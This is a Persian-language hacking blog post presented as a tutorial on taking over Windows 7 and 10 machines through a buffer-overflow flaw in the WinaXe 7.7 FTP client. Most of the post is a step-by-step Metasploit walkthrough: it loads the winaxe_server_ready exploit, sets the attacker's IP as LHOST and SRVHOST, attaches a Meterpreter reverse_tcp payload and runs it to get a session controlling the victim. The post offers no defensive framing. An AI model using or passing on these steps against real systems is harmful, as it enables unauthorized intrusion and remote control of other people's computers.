گروه برنامه نویسی گیم اور

بزرگترین وبسایت اموزشی

هربرنامه یا اموزش که نیاز دارید به سایت ما سر بزنید

بزرگترین وبسایت اموزشی

هربرنامه یا اموزش که نیاز دارید به سایت ما سر بزنید

بزرگترین وبسایت اموزشی

🕵به وب سایت ما خوش امدید 🕵

WWW.GAMEOVER.BLOG.COM

پیام های کوتاه
طبقه بندی موضوعی
نویسندگان
آخرین نظرات

اموزش هک ویندوزهای 7 و 10

🌀 آموزش هک ویندوزهای 7 و 10 با استفاده از باگ سرریزی بافر موجود در برنامه WinaXe 7.7 FTP تحت کلاینت:

با سلام. یک آسیب پذیری (باگ) از نوع سرریزی بافر در برنامه WinaXe 7.7 FTP نسخه تحت کلاینت کشف شده که باعث می شود نفوذگر توسط این باگ به سیستم هدف نفوذ کرده و کنترل آن را در دست بگیرد. این موضوع زمانی اتفاق می افتد که یک کلاینت به سرور متصل شده و منتظر دریافت پاسخ است. برای کسب اطلاعات بیشتر در مورد این برنامه می توانید از لینک زیر استفاده کنید:

⛓ http://opizo.com/shBDSM

👈🏿 در این پست نحوه نفوذ به ویندوزهای 7 و 10 را با استفاده از این باگ را قصد داریم تا بررسی کنیم. اینکار با استفاده از سیستم عامل کالی لینوکس و برنامه متاسپلویت انجام می شود.

💥 ابتدا ترمینال را باز کرده و عبارت msfconsole را تایپ و اجرا میکنیم. پس از بارگذاری کامل متاسپلویت، اکسپلویت winaxe_server_ready را با دستور زیر فراخوانی میکنیم:

use exploit/windows/ftp/winaxe_server_ready

برای مشاهده اطلاعات بیشتر در مورد این اکسپلویت و دانلود و افزودن آن به متاسپلویت از لینک زیر استفاده کنید:

⛓ http://opizo.com/4kDZLR


پس از فراخوانی اکسپلویت، دستور set lhost 192.168.0.106 را برای تنظیم پارامتر LHOST وارد میکنیم:
msf exploit (winaxe_server_ready)>set lhost 192.168.0.106

💢 توجه داشته باشید IP که در مثال فوق استفاده شده است، همان IP سیستم نفوذگر ( خود شما ) است. این IP را میتوانید با دستور ifconfig بدست آورید.

حال با دستور set srvhost 192.168.0.106 مقدار پارامتر SRVHOST که همان IP سیستمی است که وب سرور در آن اجرا خواهد شد و قرار است توسط Victim در مرورگر باز شود، را وارد میکنیم. معمولاً مقدار SRVHOST با LHOST برابر است.
msf exploit (winaxe_server_ready)>set srvhost 192.168.0.106

در مرحله بعد پیلود معروف windows/meterpreter/reverse_tcp را با دستور set payload windows/meterpreter/reverse_tcp فراخوانی و تنظیم میکنیم.
msf exploit (winaxe_server_ready)>set payload windows/meterpreter/reverse_tcp

و درنهایت با دستور exploit اقدام به ایجاد اکسپلویت کرده و آماده میشویم تا به سیستم هدف متصل شویم.
msf exploit (winaxe_server_ready)>exploit

در این مرحله و طبق تصویر ضمیمه شده، یک پنجره کوچک حاوی جزئیات اتصال ظاهر می شود که برنامه WinaXe ftp باید یک اتصال FTP را ایجاد کند. در اینجا برای ما یک نشست (Session) در Meterpreter ایجاد می شود که میتوانیم در اینجا کنترل سیستم هدف را با Meterpreter دست بگیریم...

نظرات  (۰)

هیچ نظری هنوز ثبت نشده است
نظر دادن تنها برای اعضای بیان ممکن است.
اگر قبلا در بیان ثبت نام کرده اید لطفا ابتدا وارد شوید، در غیر این صورت می توانید ثبت نام کنید.